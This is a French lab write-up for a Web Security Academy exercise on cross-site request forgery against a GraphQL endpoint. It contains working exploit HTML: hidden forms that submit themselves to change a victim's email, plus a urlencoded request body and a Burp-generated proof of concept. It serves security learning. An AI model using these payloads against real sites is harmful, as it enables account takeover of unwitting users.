Exploitation CSRF via GraphQL

Performing CSRF exploits over GraphQL

Lab: Performing CSRF exploits over GraphQL | Web Security AcademyWebSecAcademy

Contexte du lab

Les fonctionnalités de gestion des utilisateurs reposent sur un endpoint GraphQL. Point clé : l’endpoint accepte des requêtes en application/x-www-form-urlencoded, ce qui permet de déclencher une attaque CSRF (un site tiers peut forcer le navigateur de la victime à envoyer une requête valide avec ses cookies).

Objectif : créer une page HTML (hébergée sur l’exploit server) qui, lorsqu’elle est chargée par la victime, modifie son adresse e-mail.

Requête GraphQL observée

Quand on change l’e-mail depuis l’application, la requête envoyée ressemble à

{
  "query": "\n    mutation changeEmail($input: ChangeEmailInput!) {\n        changeEmail(input: $input) {\n            email\n        }\n    }\n",
  "operationName": "changeEmail",
  "variables": {
    "input": {
      "email": "[email protected]"
    }
  }
}

Méthode 1 : CSRF simple avec formulaire (recommandé)

L’idée est de reproduire la mutation GraphQL via un form POST vers l’endpoint GraphQL, avec les champs query, operationName et variables.

Exemple d’exploit à déposer sur l’exploit server :

<form
  class="login-form"
  name="change-email-form"
  action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1"
  method="POST"
>
  <input type="hidden" name="query" value="
    mutation changeEmail($input: ChangeEmailInput!) {
      changeEmail(input: $input) {
        email
      }
    }
  ">

  <input type="hidden" name="operationName" value="changeEmail">

  <input
    type="hidden"
    name="variables"
    value='{"input":{"email":"[email protected]"}}'
  >
</form>

<script>
  document.forms["change-email-form"].submit();
</script>

Résultat attendu : quand la victime ouvre la page, son navigateur envoie la requête et l’e-mail est modifié.

Méthode 2 : format x-www-form-urlencoded “pur” (équivalent)

Ici, on encode directement les paramètres comme le ferait un formulaire classique :

Content-Type: application/x-www-form-urlencoded

query=%0A++++mutation+changeEmail($input:+ChangeEmailInput!)+{%0A++++++++changeEmail(input:$input)+{%0A++++++++++++email%0A++++++++}%0A++++}%0A&operationName=changeEmail&variables={"input":{"email":"[email protected]"}}

Pratique pour vérifier rapidement à quoi ressemble la requête “form”.

Depuis Burp :

Clic droit sur la requête GraphQL
Engagement tools → Generate CSRF PoC
Burp produit un HTML prêt à héberger, par exemple :

<html>

  <!-- CSRF PoC - generated by Burp Suite Professional -->

  <body>

    <form action="https://0ace0022038ab64b803c033800f30057.web-security-academy.net/graphql/v1" method="POST">

      <input type="hidden" name="query" value="&#10;&#32;&#32;&#32;&#32;mutation&#32;changeEmail&#40;&#36;input&#58;&#32;ChangeEmailInput&#33;&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;changeEmail&#40;input&#58;&#36;input&#41;&#32;&#123;&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;email&#10;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#32;&#125;&#10;&#32;&#32;&#32;&#32;&#125;&#10;" />

      <input type="hidden" name="operationName" value="changeEmail" />

      <input type="hidden" name="variables" value="&#123;&quot;input&quot;&#58;&#123;&quot;email&quot;&#58;&quot;test&#64;test&#46;com&quot;&#125;&#125;" />

      <input type="submit" value="Submit request" />

    </form>

    <script>

      history.pushState('', '', '/');

      document.forms[0].submit();

    </script>

  </body>

</html>

Mis à jour il y a 1 mois

hashtagPerforming CSRF exploits over GraphQL

hashtagContexte du lab

hashtagRequête GraphQL observée

hashtagMéthode 1 : CSRF simple avec formulaire (recommandé)

hashtagMéthode 2 : format x-www-form-urlencoded “pur” (équivalent)

Performing CSRF exploits over GraphQL

Contexte du lab

Requête GraphQL observée

Méthode 1 : CSRF simple avec formulaire (recommandé)

Méthode 2 : format x-www-form-urlencoded “pur” (équivalent)